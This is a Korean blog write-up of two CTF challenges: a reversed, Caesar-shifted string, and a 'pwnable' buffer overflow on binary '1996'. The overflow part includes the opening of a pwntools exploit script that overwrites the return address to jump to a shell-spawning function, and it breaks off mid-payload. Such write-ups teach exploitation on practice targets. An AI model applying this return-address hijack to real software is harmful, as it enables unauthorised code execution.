해당 문제를 보면 파일하나를 주고, 힌트로 [::-1]을 줍니다. 해당 파일을 보면 이러한 문자열 하나를 주는데요, 힌트가 [::-1]을 줬으니, 파이썬으로 똑같이 해줍시다. "mshn pz K0_f0b_ru0d_J4lz4y?" 이런 문자열 하나를 주는데 카이사르 같은 느낌이 들어서 툴로 돌려봤습니다. 바로 flag를 확인할 수 있네요 ㅎ

pwnable문제입니다. 1996 파일 하나 주는데 해당 파일을 실행시켜보면 이렇게 인풋하나를 받고 다시 출력시켜줍니다. 16번째 줄을보면 해당중에서 name을 받고 shell을 띄워주는 함수가 있으니 ret를 여기로 주면 될 것 같습니다. 페이로드는 아래와 같습니다. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 from pwn import * r = remote("ctf.j0n9hyun.xyz", 3013) #r = process("./1996") e = ELF("./1996") context.log_level = "debug" shell = 0x0000000000400897 r.recvuntil("? ") payload = "" payload += "A"*0x410..